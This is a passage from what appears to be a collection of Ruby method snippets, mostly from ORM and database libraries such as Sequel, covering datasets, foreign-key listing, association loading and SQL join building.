table\n # alias.\n records_map = {@master=>{}}\n alias_map.keys.each{|ta| records_map[ta] = {}}\n @records_map = records_map\n\n datasets = opts[:graph][:table_aliases].to_a.reject{|ta,ds| ds.nil?}\n column_aliases = opts[:graph_aliases] || opts[:graph][:column_aliases] # SEQUEL5: Remove :graph_aliases support\n primary_keys = {}\n column_maps = {}\n models = {}\n row_procs = {}\n datasets.each do |ta, ds|\n models[ta] = ds.model\n primary_keys[ta] = []\n column_maps[ta] = {}\n row_procs[ta] = ds.row_proc\n end\n column_aliases.each do |col_alias, tc|\n ta, column = tc\n column_maps[ta][col_alias] = column\n end\n column_maps.each do |ta, h|\n pk = models[ta].primary_key\n if pk.is_a?(Array)\n primary_keys[ta] = []\n h.select{|ca, c| primary_keys[ta] << ca if pk.include?(c)}\n else\n h.select{|ca, c| primary_keys[ta] = ca if pk == c}\n end\n end\n @column_maps = column_maps\n @primary_keys = primary_keys\n @row_procs = row_procs\n\n # For performance, create two special maps for the master table,\n # so you can skip a hash lookup.\n @master_column_map = column_maps[master]\n @master_primary_keys = primary_keys[master]\n\n # Add a special hash mapping table alias symbols to 5 element arrays that just\n # contain the data in other data structures for that table alias. This is\n # used for performance, to get all values in one hash lookup instead of\n # separate hash lookups for each data structure.\n ta_map = {}\n alias_map.keys.each do |ta|\n ta_map[ta] = [records_map[ta], row_procs[ta], alias_map[ta], type_map[ta], reciprocal_map[ta]]\n end\n @ta_map = ta_map\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n if ds.joined_dataset?\n # raise Error, \"Using a joined dataset as a model dataset is not support, use from_self on the dataset to wrap it in a subquery\" # SEQUEL5\n Sequel::Deprecation.deprecate(\"Using a joined dataset as a Sequel::Model dataset\", respond_to?(:cti_base_model) ? \"Use the class_table_inheritance plugin :alias option in #{cti_base_model.inspect}\" : \"Call from_self on the dataset to wrap it in a subquery\")\n end\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def set_dataset_rel_and_attr\n @dataset.database = @database\n @dataset_id = @dataset.id\n organization = Organization.find_by_id(@organization_id)\n organization.datasets << @dataset\n @dataset.organization = organization\n end",
"def create_datasets(builder)\n each_dataset(builder) do |ds|\n builder.create_dataset(ds, mapping: true, parents: ds.root?)\n end\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def build_embedded_model_lists(data)\n return false unless relations.include? :embed_many\n\n relations[:embed_many].each do |name, relation|\n value = if data.key? relation[:alias] then data[relation[:alias]]\n elsif data.key? name then data[name]\n else []\n end\n\n @embedded_model_lists[name] = ::Mandrake::EmbeddedModelList.new(relation[:model], value)\n end\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n ds = ds.from_self(:alias=>ds.first_source) if ds.joined_dataset?\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def dataset\n database[table_name]\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n schema, _ = opts.fetch(:schema, schema_and_table(table))\n\n h = {}\n fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP \n reverse = opts[:reverse]\n\n (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|\n if reverse\n key = [row[:schema], row[:table], row[:name]]\n else\n key = row[:name]\n end\n\n if r = h[key]\n r[:columns] << m.call(row[:column])\n r[:key] << m.call(row[:refcolumn])\n else\n entry = h[key] = {\n :name=>m.call(row[:name]),\n :columns=>[m.call(row[:column])],\n :key=>[m.call(row[:refcolumn])],\n :on_update=>fklod_map[row[:on_update]],\n :on_delete=>fklod_map[row[:on_delete]],\n :deferrable=>row[:deferrable],\n :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),\n }\n\n unless schema\n # If not combining schema information into the :table entry\n # include it as a separate entry.\n entry[:schema] = m.call(row[:schema])\n end\n end\n end\n\n h.values\n end",
"def initialize_datasets\n @datasets = gateways.each_with_object({}) do |(key, gateway), h|\n h[key] = gateway.schema if config.gateways[key][:infer_relations]\n end\n end",
"def datasets\n ds = inclusively { dataset }\n [ds] + ds.descendants\n end",
"def load_dataset_structure(pid,dataset)\r\n @pid = pid\r\n GoodData.use @pid\r\n choosen_dataset = find_dataset(dataset)\r\n @dataset = GoodData::MdObject.new((GoodData.get choosen_dataset.uri)['dataSet'])\r\n\r\n #Load all atrribute info\r\n @dataset.content['attributes'].map do |e|\r\n att_id = e.match(\"[0-9]*$\").to_s\r\n @att[att_id] = Attribute.new((GoodData.get e)['attribute'])\r\n end\r\n\r\n #Load all fact info\r\n @dataset.content['facts'].map do |e|\r\n fact_id = e.match(\"[0-9]*$\").to_s\r\n @fact[fact_id] = Fact.new((GoodData.get e)['fact'])\r\n end\r\n end",
"def wrap_dataset(dataset)\n if relation.is_a?(Relation::Composite)\n relation.new(dataset).to_a\n else\n dataset\n end\n end",
"def creatables(include_references: nil); end",
"def dataset\n @dataset ||= generate_dataset\n end",
"def dataset_method\n :\"#{self[:name]}_dataset\"\n end",
"def dataset\n ds = Sequel::Dataset.new(self)\n end",
"def dataset\n ds = Sequel::Dataset.new(self)\n end",
"def build(data_set_name)\n raise Interfaces::DataSetAlreadyExists if interface(data_set_name).data_set_exists?\n build!(data_set_name)\n end",
"def build(attributes)\n if @parent.persisted?\n parent_foreign_key = @parent.class.demodulized_name.foreign_key.to_sym\n attributes[parent_foreign_key] = @parent.id\n end\n\n record = client.adapter_for(@class_name).build(attributes)\n @target << record\n record\n end",
"def dataset\n @dataset ||= data_maker.dataset\n end",
"def build(data_list)\n @models = []\n\n data_list.each do |data|\n @models << @klass.new(data)\n end\n end",
"def dataset_method\n :\"#{self[:name]}_dataset\"\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def dataset\n DB[SQL, from: from_truncated, to: to_truncated, tick: tick]\n end",
"def _dataset_method\n :\"_#{self[:name]}_dataset\"\n end",
"def _schema_ds\n @_schema_ds ||= begin\n ds = metadata_dataset.select{[\n pg_attribute[:attname].as(:name),\n SQL::Cast.new(pg_attribute[:atttypid], :integer).as(:oid),\n SQL::Cast.new(basetype[:oid], :integer).as(:base_oid),\n SQL::Function.new(:format_type, basetype[:oid], pg_type[:typtypmod]).as(:db_base_type),\n SQL::Function.new(:format_type, pg_type[:oid], pg_attribute[:atttypmod]).as(:db_type),\n SQL::Function.new(:pg_get_expr, pg_attrdef[:adbin], pg_class[:oid]).as(:default),\n SQL::BooleanExpression.new(:NOT, pg_attribute[:attnotnull]).as(:allow_null),\n SQL::Function.new(:COALESCE, SQL::BooleanExpression.from_value_pairs(pg_attribute[:attnum] => SQL::Function.new(:ANY, pg_index[:indkey])), false).as(:primary_key),\n Sequel[:pg_type][:typtype],\n (~Sequel[Sequel[:elementtype][:oid]=>nil]).as(:is_array),\n ]}.\n from(:pg_class).\n join(:pg_attribute, :attrelid=>:oid).\n join(:pg_type, :oid=>:atttypid).\n left_outer_join(Sequel[:pg_type].as(:basetype), :oid=>:typbasetype).\n left_outer_join(Sequel[:pg_type].as(:elementtype), :typarray=>Sequel[:pg_type][:oid]).\n left_outer_join(:pg_attrdef, :adrelid=>Sequel[:pg_class][:oid], :adnum=>Sequel[:pg_attribute][:attnum]).\n left_outer_join(:pg_index, :indrelid=>Sequel[:pg_class][:oid], :indisprimary=>true).\n where{{pg_attribute[:attisdropped]=>false}}.\n where{pg_attribute[:attnum] > 0}.\n order{pg_attribute[:attnum]}\n\n # :nocov:\n if server_version > 100000\n # :nocov:\n ds = ds.select_append{pg_attribute[:attidentity]}\n\n # :nocov:\n if server_version > 120000\n # :nocov:\n ds = ds.select_append{Sequel.~(pg_attribute[:attgenerated]=>'').as(:generated)}\n end\n end\n\n ds\n end\n end",
"def _associated_dataset\n associated_class.dataset.clone\n end",
"def dataset\n @dataset ||= begin\n create_table!\n database[:data_stores]\n end\n end",
"def schema_ds_dataset\n schema_utility_dataset\n end",
"def def_one_to_many(opts)\n one_to_one = opts[:type] == :one_to_one\n name = opts[:name]\n key = (opts[:key] ||= opts.default_key)\n km = opts[:key_method] ||= opts[:key]\n cks = opts[:keys] = Array(key)\n opts[:key_methods] = Array(opts[:key_method])\n primary_key = (opts[:primary_key] ||= self.primary_key)\n opts[:eager_loader_key] = primary_key unless opts.has_key?(:eager_loader_key)\n cpks = opts[:primary_keys] = Array(primary_key)\n pkc = opts[:primary_key_column] ||= primary_key\n pkcs = opts[:primary_key_columns] ||= Array(pkc)\n raise(Error, \"mismatched number of keys: #{cks.inspect} vs #{cpks.inspect}\") unless cks.length == cpks.length\n uses_cks = opts[:uses_composite_keys] = cks.length > 1\n opts[:dataset] ||= opts.association_dataset_proc\n opts[:eager_loader] ||= proc do |eo|\n h = eo[:id_map]\n reciprocal = opts.reciprocal\n assign_singular = opts.assign_singular?\n delete_rn = opts.delete_row_number_column\n\n eager_load_results(opts, eo) do |assoc_record|\n assoc_record.values.delete(delete_rn) if delete_rn\n hash_key = uses_cks ? km.map{|k| assoc_record.get_column_value(k)} : assoc_record.get_column_value(km)\n next unless objects = h[hash_key]\n if assign_singular\n objects.each do |object| \n unless object.associations[name]\n object.associations[name] = assoc_record\n assoc_record.associations[reciprocal] = object if reciprocal\n end\n end\n else\n objects.each do |object| \n object.associations[name].push(assoc_record)\n assoc_record.associations[reciprocal] = object if reciprocal\n end\n end\n end\n end\n \n join_type = opts[:graph_join_type]\n select = opts[:graph_select]\n use_only_conditions = opts.include?(:graph_only_conditions)\n only_conditions = opts[:graph_only_conditions]\n conditions = opts[:graph_conditions]\n opts[:cartesian_product_number] ||= one_to_one ? 0 : 1\n graph_block = opts[:graph_block]\n opts[:eager_grapher] ||= proc do |eo|\n ds = eo[:self]\n ds = ds.graph(opts.apply_eager_graph_limit_strategy(eo[:limit_strategy], eager_graph_dataset(opts, eo)), use_only_conditions ? 
only_conditions : cks.zip(pkcs) + conditions, Hash[eo].merge!(:select=>select, :join_type=>eo[:join_type]||join_type, :qualify=>:deep, :from_self_alias=>eo[:from_self_alias]), &graph_block)\n # We only load reciprocals for one_to_many associations, as other reciprocals don't make sense\n ds.opts[:eager_graph][:reciprocals][eo[:table_alias]] = opts.reciprocal\n ds\n end\n \n return if opts[:read_only]\n\n save_opts = {:validate=>opts[:validate]}\n ck_nil_hash ={}\n cks.each{|k| ck_nil_hash[k] = nil}\n\n if one_to_one\n opts[:setter] ||= proc do |o|\n up_ds = _apply_association_options(opts, opts.associated_dataset.where(cks.zip(cpks.map{|k| get_column_value(k)})))\n if o\n up_ds = up_ds.exclude(o.pk_hash) unless o.new?\n cks.zip(cpks).each{|k, pk| o.set_column_value(:\"#{k}=\", get_column_value(pk))}\n end\n checked_transaction do\n up_ds.skip_limit_check.update(ck_nil_hash)\n o.save(save_opts) || raise(Sequel::Error, \"invalid associated object, cannot save\") if o\n end\n end\n opts[:_setter] = proc{|o| set_one_to_one_associated_object(opts, o)}\n else \n save_opts[:raise_on_failure] = opts[:raise_on_save_failure] != false\n\n opts[:adder] ||= proc do |o|\n cks.zip(cpks).each{|k, pk| o.set_column_value(:\"#{k}=\", get_column_value(pk))}\n o.save(save_opts)\n end\n \n opts[:remover] ||= proc do |o|\n cks.each{|k| o.set_column_value(:\"#{k}=\", nil)}\n o.save(save_opts)\n end\n\n opts[:clearer] ||= proc do\n _apply_association_options(opts, opts.associated_dataset.where(cks.zip(cpks.map{|k| get_column_value(k)}))).update(ck_nil_hash)\n end\n end\n end",
"def to_maql_create\n maql = \"# Create the '#{self.title}' data set\\n\"\n maql += \"CREATE DATASET {#{self.identifier}} VISUAL (TITLE \\\"#{self.title}\\\");\\n\\n\"\n [ attributes, facts, { 1 => @connection_point } ].each do |objects|\n objects.values.each do |obj|\n maql += \"# Create '#{obj.title}' and add it to the '#{self.title}' data set.\\n\"\n maql += obj.to_maql_create\n maql += \"ALTER DATASET {#{self.identifier}} ADD {#{obj.identifier}};\\n\\n\"\n end\n end\n\n labels.each do |label|\n maql += \"# Creating Labels\\n\"\n maql += label.to_maql_create\n end\n\n references.values.each do |ref|\n maql += \"# Creating references\\n\"\n maql += ref.to_maql_create\n end\n\n folders_maql = \"# Create folders\\n\"\n (folders[:attributes].values + folders[:facts].values).each { |folder| folders_maql += folder.to_maql_create }\n folders_maql + \"\\n\" + maql + \"SYNCHRONIZE {#{identifier}};\\n\"\n end",
"def source_data_set\n get :data_set, PublicEarth::Db::DataSet.for_anonymous(@ip_address, get(:tracking_id, UUIDTools::UUID.random_create.to_s))\n end",
"def data_for_serialize\n da=DAData.new @root\n [@words.build,da.base,da.check]\n end",
"def datasets\n datasets = []\n dataset.each do |d|\n if d[:data].first.is_a?(Array)\n datasets += d[:data]\n else\n datasets << d[:data]\n end\n end\n datasets\n end",
"def dataset\n self\n end",
"def dataset\n self\n end",
"def dataset\n self\n end",
"def selection_data\n dataset ||= DB[:selections]\n end",
"def _metadata_dataset\n super.\n with_identifier_input_method(identifier_input_method_default).\n with_identifier_output_method(identifier_output_method_default)\n end",
"def foreign_keys\n vals = []\n foreign_key_fields.each do |field|\n vals << self.send(field)\n end\n vals\n end",
"def prepare_identities_from_data; end",
"def build_keys(data)\n # List of keys with defaults to process after the rest of the\n # data has been loaded\n post_process_keys = []\n\n key_objects.each do |name, key|\n attribute_value = if data.key? key.alias then data[key.alias] # Should be stored under the alias...\n elsif data.key? name then data[name] # ...but may be stored under the full name\n else # new key - set to default\n if key.default.respond_to?(:call) # It's a Proc - deal with it later\n post_process_keys << name\n nil\n else key.default\n end\n end\n\n @attribute_objects[name] = key.create_attribute(attribute_value)\n end\n\n post_process_defaults(post_process_keys)\n end",
"def children_table; end",
"def _join_table_dataset(opts)\n ds = model.db.from(opts.join_table_source)\n opts[:join_table_block] ? opts[:join_table_block].call(ds) : ds\n end",
"def __column_data__\n ColumnData.new(@columns, @primary_keys, @to_avoid, @default_values, @associations)\n end",
"def set_datasets\n @datasets = current_user.get_datasets 'all'\n\n @metadata_array = []\n @metadata_array = Dataset.get_metadata_list(@datasets.map{|ds| ds.id}) if @datasets\n\n # TODO: Find a better way to do this\n @datasets.each_with_index do |ds, i|\n ds.metadata = @metadata_array['data'][i]['attributes']\n end\n end",
"def construct_join_attributes(*records)\n if @reflection.source_reflection.macro != :belongs_to\n raise HasManyThroughCantAssociateThroughHasOneOrManyReflection.new(@owner, @reflection)\n end\n\n join_attributes = {\n @reflection.source_reflection.foreign_key =>\n records.map { |record|\n record.send(@reflection.source_reflection.association_primary_key)\n }\n }\n\n if @reflection.options[:source_type]\n join_attributes[@reflection.source_reflection.foreign_type] =\n records.map { |record| record.class.base_class.name }\n end\n\n if records.count == 1\n Hash[join_attributes.map { |k, v| [k, v.first] }]\n else\n join_attributes\n end\n end",
"def eager_loading_dataset(eo=OPTS)\n ds = eo[:dataset] || associated_eager_dataset\n if id_map = eo[:id_map]\n ds = ds.where(eager_loading_predicate_condition(id_map.keys))\n end\n if associations = eo[:associations]\n ds = ds.eager(associations)\n end\n if block = eo[:eager_block]\n ds = block.call(ds)\n end\n if eager_loading_use_associated_key?\n ds = ds.select_append(*associated_key_array)\n end\n if self[:eager_graph]\n raise(Error, \"cannot eagerly load a #{self[:type]} association that uses :eager_graph\") if eager_loading_use_associated_key?\n ds = ds.eager_graph(self[:eager_graph])\n end\n ds\n end",
"def dataset\n @dataset_class.new(self)\n end",
"def data_attributes\n @schema.schema.select {|k,_| k.to_s.start_with?('data_') or k.to_s.start_with?('data-')}.inject({}) {|col,(k,v)| col[k[5..-1].to_sym]=v;col}\n end",
"def find_recursive_datasets(datasets)\n all_datasets = datasets['included'] + datasets['excluded']\n single = []\n recursive = []\n cleaned_recursive = []\n\n ### Find datasets that must be single, or are eligible for recursive\n datasets['included'].each do |dataset|\n excluded_child = false\n # Find all children_datasets\n children_datasets = all_datasets.select { |child_dataset| child_dataset.name.start_with? dataset.name }\n children_datasets.each do |child_dataset|\n if datasets['excluded'].include?(child_dataset)\n excluded_child = true\n single << dataset\n break\n end\n end\n unless excluded_child\n recursive << dataset\n end\n end\n\n ## Cleanup recursive\n recursive.each do |dataset|\n if dataset.name.include?('/')\n parts = dataset.name.rpartition('/')\n parent = all_datasets.find { |parent_dataset| parent_dataset.name == parts[0] }\n else\n parent = dataset\n end\n\n # Parent dataset\n if parent == dataset\n cleaned_recursive << dataset\n next\n end\n\n # Only add this if its parent is not in the recursive list\n cleaned_recursive << dataset unless recursive.include?(parent)\n end\n\n # If any children have a DB, need to set it in the recursive parent\n cleaned_recursive.each do |parent|\n all_datasets.each do |dataset|\n # Is this dataset a child of the parent?\n next if !dataset.name.include?(parent.name)\n # If this dataset has a DB, set the parent to contain it as well.\n if dataset.db\n parent.contains_db!(dataset.db)\n end\n end\n end\n\n\n {\n 'single' => single,\n 'recursive' => cleaned_recursive,\n 'included' => datasets['included'],\n 'excluded' => datasets['excluded'],\n }\nend",
"def create_data\n @entities_total.times do |i|\n @data << entity_class.new(i, self)\n end\n end",
"def reflection_to_foreign_keys!( reflection, foreign_key_list )\n reflection_to_foreign_keys( reflection ).each do |foreign_key|\n #skip if already in this list or the fk has already been uped in the db\n next if includes_foreign_key?( foreign_key, foreign_key_list ) ||\n existing_foreign_key?( foreign_key )\n foreign_key_list << foreign_key\n end\n end",
"def extract_dbc_data\n tabledata = {}\n\n curt = nil\n @db.each do |r|\n unless r.nil?\n if r.objecttype == \"Table\"\n # This is a related table\n tabledata[r.objectid] = {name: r.objectname, fields: []}\n elsif r.objecttype == \"Field\"\n # This is a related field. The parentid points to the table object\n\n # create using the parentid if the parentid is still unknown.\n tabledata[r.parentid] = {name: \"UNKNOWN\", fields: []} unless tabledata.has_key?(r.parentid)\n tabledata[r.parentid][:fields] << r.objectname\n end\n end\n end\n\n # now we need to transform the resulting array-hash to a direct mapping (changed to support older Ruby versions)\n # { tablename => [fieldnames] }\n @tables = {}\n tabledata.each{|k, v| @tables[v[:name]] = v[:fields] }\n end",
"def foreign_keys(*partition_key_values)\n return collect_from_collection(*partition_key_values, &:foreign_keys).inject(Set.new) do |set,new_items|\n if new_items.is_a? Array\n set += new_items\n else\n set += [new_items]\n end\n set\n end\n end",
"def get_dataset(table)\n #puts \"converting to a dataset\"\n to_dataset(@datafiles[table].content)\n end",
"def data_objects(project_id, collection_id)\n ::Syncano::QueryBuilder.new(self, ::Syncano::Resources::DataObject, project_id: project_id, collection_id: collection_id)\n end",
"def data_sets\n update\n library.values\n end",
"def flatten!\n self.class.attributes.keys.select { |k| k.end_with?('_data') }.each do |data_attr|\n reference_attr = data_attr[/(.+?)_data$/, 1]\n value = send(data_attr)\n next if value.nil?\n\n send(\"#{data_attr}=\", value)\n send(\"#{reference_attr})\", nil)\n end\n\n self\n end",
"def build_embedded_models(data)\n return false unless relations.include? :embed_one\n\n relations[:embed_one].each do |name, relation|\n value = if data.key? relation[:alias] then data[relation[:alias]]\n elsif data.key? name then data[name]\n else nil\n end\n\n @embedded_models[name] = ::Mandrake::EmbeddedModel.new(relation[:model], value)\n end\n end",
"def setup_columns\n if inheritable?\n SimpleSet.new([primary_key, inheritance_column])\n else\n primary_key.blank? ? SimpleSet.new : SimpleSet.new([primary_key])\n end \n end",
"def dataset(name)\n fetch_or_store(name) { Dataset.new(rql.table(name), rql, self) }\n end",
"def data_model\n @data_model ||= items.each_with_object(Hash.new {|h,k| h[k] = [] }) do |item, result|\n result[get_user_mapped_id(item.user_id)] << [get_item_mapped_id(item.item_id), item.interest_score]\n end\n end",
"def def_many_to_one(opts)\n name = opts[:name]\n opts[:key] = opts.default_key unless opts.has_key?(:key)\n key = opts[:key]\n opts[:eager_loader_key] = key unless opts.has_key?(:eager_loader_key)\n cks = opts[:graph_keys] = opts[:keys] = Array(key)\n opts[:key_column] ||= key\n opts[:graph_keys] = opts[:key_columns] = Array(opts[:key_column])\n opts[:qualified_key] = opts.qualify_cur(key)\n if opts[:primary_key]\n cpks = Array(opts[:primary_key])\n raise(Error, \"mismatched number of keys: #{cks.inspect} vs #{cpks.inspect}\") unless cks.length == cpks.length\n end\n uses_cks = opts[:uses_composite_keys] = cks.length > 1\n opts[:cartesian_product_number] ||= 0\n\n if !opts.has_key?(:many_to_one_pk_lookup) &&\n (opts[:dataset] || opts[:conditions] || opts[:block] || opts[:select] ||\n (opts.has_key?(:key) && opts[:key] == nil))\n opts[:many_to_one_pk_lookup] = false\n end\n auto_assocs = @autoreloading_associations\n cks.each do |k|\n (auto_assocs[k] ||= []) << name\n end\n\n opts[:dataset] ||= opts.association_dataset_proc\n opts[:eager_loader] ||= proc do |eo|\n h = eo[:id_map]\n pk_meths = opts.primary_key_methods\n\n eager_load_results(opts, eo) do |assoc_record|\n hash_key = uses_cks ? pk_meths.map{|k| assoc_record.get_column_value(k)} : assoc_record.get_column_value(opts.primary_key_method)\n if objects = h[hash_key]\n objects.each{|object| object.associations[name] = assoc_record}\n end\n end\n end\n \n join_type = opts[:graph_join_type]\n select = opts[:graph_select]\n use_only_conditions = opts.include?(:graph_only_conditions)\n only_conditions = opts[:graph_only_conditions]\n conditions = opts[:graph_conditions]\n graph_block = opts[:graph_block]\n graph_cks = opts[:graph_keys]\n opts[:eager_grapher] ||= proc do |eo|\n ds = eo[:self]\n ds.graph(eager_graph_dataset(opts, eo), use_only_conditions ? only_conditions : opts.primary_keys.zip(graph_cks) + conditions, Hash[eo].merge!(:select=>select, :join_type=>eo[:join_type]||join_type, :qualify=>:deep, :from_self_alias=>eo[:from_self_alias]), &graph_block)\n end\n \n return if opts[:read_only]\n \n opts[:setter] ||= proc{|o| cks.zip(opts.primary_key_methods).each{|k, pk| set_column_value(:\"#{k}=\", (o.get_column_value(pk) if o))}}\n opts[:_setter] = proc{|o| set_associated_object(opts, o)}\n end",
"def idols_data\n\n\t\t[[ \"Last name\", \"First name\", \"Description\" ]] + [[ @view_context.number_to_currency(1), 2, 3] ] +\n\t\t@idols.map { |idol| [idol.last_name, idol.first_name, idol.talents.first.description] }\n\n\tend",
"def association_dataset_for(object)\n condition = if can_have_associated_objects?(object)\n predicate_keys.zip(predicate_key_values(object))\n else\n false\n end\n\n associated_dataset.where(condition)\n end",
"def generate_dc_job_data\n @job_data[\"name\"] = @name if @name\n @row_hash[\"source\"] = @row_hash[\"dc_source\"]\n @row_hash.delete(\"dc_source\")\n @job_data = @source.fetch_source_data(nil, @row_hash)\n end",
"def to_json\n hash = {}\n hash['dataSetName'] = dataset_name\n if column_metadata.nil? == false\n hash['columns'] = {}\n column_metadata.each do |column|\n hash['columns'].merge!(column.to_hash)\n end\n end\n hash['joins'] = []\n joins.each do |join|\n hash['joins'] << join.to_hash\n end\n hash.to_json\n end",
"def initialize\n @columns = { }\n @primary_keys = []\n @to_avoid = []\n @default_values = { }\n @associations = \n {\n :belongs_to => { },\n :has_one => { },\n :has_n => { }\n }\n end",
"def source_data_set\n @data_set ||= PublicEarth::Db::DataSet.for_user(self)\n end",
"def make\n if dimension?\n dimension_key_builder\n elsif fact?\n FactKeyBuilder.new(staging_db[table.table_name])\n end\n end",
"def fk_join_arr\n result = []\n groups.each_with_index do |group, idx|\n group_alias = \"#{group.parent_table}_#{idx}\"\n group_query = group_query_builder(group)\n result.push \"JOIN (\\n#{group_query}\\n\\t) AS #{group_alias}_fk\"\n result.push \"ON #{group_alias}_fk.#{FKEYS[group.parent_table]}=#{group.parent_table}.#{group.parent_table_pk}\"\n if idx > 0\n groups.each_with_index do |x_group, x_idx|\n #next if x_idx < idx\n x_group_alias = \"#{x_group.parent_table}_#{x_idx}\"\n result.push \"\\tAND #{x_group_alias}_fk.year = #{group_alias}_fk.year\"\n break\n end\n end\n end\n return result\n end",
"def add_piggy_back_sql_data!(reflection_name, prefix, table_alias, attributes, select, joins, conditions, join_type)\n ktn = table_name\n kpkey = primary_key\n reflection = reflections[reflection_name]\n atn = reflection.table_name\n attributes.each do |attr|\n if table_alias\n select << \", #{table_alias}.#{attr} AS #{prefix}_#{attr}\"\n else\n select << \", #{atn}.#{attr} AS #{prefix}_#{attr}\"\n end\n end\n fkey = reflection.primary_key_name\n fpkey = reflection.klass.primary_key\n\n case reflection.macro\n when :belongs_to\n if table_alias\n joins << \" #{join_type} JOIN #{atn} #{table_alias} ON #{table_alias}.#{fpkey}=#{ktn}.#{fkey} \"\n else\n joins << \" #{join_type} JOIN #{atn} ON #{atn}.#{fpkey}=#{ktn}.#{fkey} \"\n end\n when :has_one\n if table_alias\n joins << \" #{join_type} JOIN #{atn} #{table_alias} ON #{table_alias}.#{fkey}=#{ktn}.#{kpkey} \"\n else\n joins << \" #{join_type} JOIN #{atn} ON #{atn}.#{fkey}=#{ktn}.#{kpkey} \"\n end\n when :has_many\n raise \"piggy_back: aliasing not implemented for has_many\" if table_alias\n if reflection.options[:through]\n ttn = reflection.through_reflection.klass.table_name\n tkfkey = reflection.through_reflection.primary_key_name\n tafkey = reflection.source_reflection.primary_key_name\n\n through_conditions = reflection.options[:conditions] ?\n \" AND \" + reflection.options[:conditions] : \"\"\n source_conditions = reflection.through_reflection.options[:conditions] ?\n \" AND \" + reflection.through_reflection.options[:conditions] : \"\"\n\n joins << \" LEFT JOIN #{ttn} ON (#{ttn}.#{tkfkey}=#{ktn}.#{kpkey}#{through_conditions})\"\n joins << \" LEFT JOIN #{atn} ON (#{ttn}.#{tafkey}=#{atn}.#{fpkey}#{source_conditions}) \"\n else\n reflection_conditions = reflection.options[:conditions] ?\n \" AND \" + reflection.options[:conditions] : \"\"\n\n joins << \" LEFT JOIN #{atn} ON (#{atn}.#{fkey}=#{ktn}.#{kpkey}#{reflection_conditions}) \"\n end\n else\n raise \"can't piggy back #{reflection.macro} on class #{klass}\"\n end\n end",
"def _select_serial_sequence_ds\n @_serial_sequence_ds ||= metadata_dataset.\n from{[\n pg_class.as(:seq),\n pg_attribute.as(:attr),\n pg_depend.as(:dep),\n pg_namespace.as(:name),\n pg_constraint.as(:cons),\n pg_class.as(:t)\n ]}.\n where{[\n [seq[:oid], dep[:objid]],\n [seq[:relnamespace], name[:oid]],\n [seq[:relkind], 'S'],\n [attr[:attrelid], dep[:refobjid]],\n [attr[:attnum], dep[:refobjsubid]],\n [attr[:attrelid], cons[:conrelid]],\n [attr[:attnum], cons[:conkey].sql_subscript(1)],\n [attr[:attrelid], t[:oid]],\n [cons[:contype], 'p']\n ]}.\n select{[\n name[:nspname].as(:schema),\n seq[:relname].as(:sequence)\n ]}\n end",
"def data_matrix_all(coll, data_matrix)\n pas = coll.part_associations\n part_ids = pas.collect(&:part_id)\n das = DataAssociation.where(parent_class: 'Item', parent_id: part_ids)\n pas.each do |pa|\n data_matrix[pa.row][pa.column] = {}\n das.select { |da| da.parent_id == pa.part_id }.each do |da|\n data_matrix[pa.row][pa.column][da.key] = da.value\n end\n end\n data_matrix\n end",
"def schema_utility_dataset\n @schema_utility_dataset ||= dataset\n end",
"def schema_utility_dataset\n @schema_utility_dataset ||= dataset\n end",
"def link!\n base = ::ActiveRecord::Associations::ClassMethods::JoinDependency.new(\n @model, [], nil\n )\n \n @fields.each { |field|\n field.model ||= @model\n field.columns.each { |col|\n field.associations[col] = associations(col.__stack.clone)\n field.associations[col].each { |assoc| assoc.join_to(base) }\n }\n }\n \n @attributes.each { |attribute|\n attribute.model ||= @model\n attribute.columns.each { |col|\n attribute.associations[col] = associations(col.__stack.clone)\n attribute.associations[col].each { |assoc| assoc.join_to(base) }\n }\n }\n end",
"def dataset\n @@dataset\n end",
"def data(opts = {})\n sources = self.attributes[:sources] || []\n seq_opts = {:kind => self.attributes[:kind].to_sym}.merge(opts)\n sequence = SequenceQuery.new(sources, seq_opts)\n seqs = sequence.sequences\n seqs.map do |seq|\n {\n :data => seq[1],\n :start_time => sequence.start_time_epoch,\n :source => seq[0]\n }\n end\n end",
"def piedata\n\t\tlist = Array.new\n\t\tlabel = self.descriptions.joins(:identity).group(\"identities.name\").order(\"identities.name\").count\n\t\tlabel.each do |key, val|\n\t\t\th = Hash.new\n\t\t\th[:label] = key\n\t\t\th[:value] = val\n\t\t\tlist << h\n\t\tend\n\t\treturn list\n\tend",
"def fetch_data(key_list)\n data = self\n key_list.each { |key| data = fetch_key_with_initialization(key, data) }\n data\n end",
